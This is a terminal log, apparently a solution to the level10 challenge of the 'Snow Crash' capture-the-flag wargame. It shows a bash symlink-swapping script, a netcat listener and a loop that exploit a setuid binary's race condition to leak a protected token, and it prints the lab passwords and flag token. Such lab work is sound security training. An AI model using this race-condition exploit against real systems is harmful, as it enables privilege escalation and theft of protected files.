┌──$ [~/42/2021/snow-crash]
└─>  ssh 192.168.1.64 -p 4242 -l level10
level10@192.168.1.64's password: s5cAJpM8ev6XHw998pRWG728z
level10@SnowCrash:~$ vi /tmp/swap
#!/bin/bash

TOKEN=/home/user/level10/token
SYMLINK=/tmp/symlink
EMPTYFILE=/tmp/empty
TMPFILE=$(/bin/mktemp)

/usr/bin/touch $EMPTYFILE
/bin/ln -s $TOKEN $SYMLINK

while true
do
	/bin/mv $SYMLINK $TMPFILE
	/bin/mv $EMPTYFILE $SYMLINK
	/bin/mv $TMPFILE $EMPTYFILE
done
level10@SnowCrash:~$ chmod +x /tmp/swap
level10@SnowCrash:~$ /tmp/swap &
level10@SnowCrash:~$ nc -lk 6969 | grep -v ".*( )*." &
level10@SnowCrash:~$ while true; do ./level10 /tmp/symlink 127.0.0.1; done &>/dev/null
woupa2yuojeeaaed06riuj63c
level10@SnowCrash:~$ su flag10
Password: woupa2yuojeeaaed06riuj63c
Don't forget to launch getflag !
flag10@SnowCrash:~$ getflag
Check flag.Here is your token : feulo4b72j7edeahuete3no7c
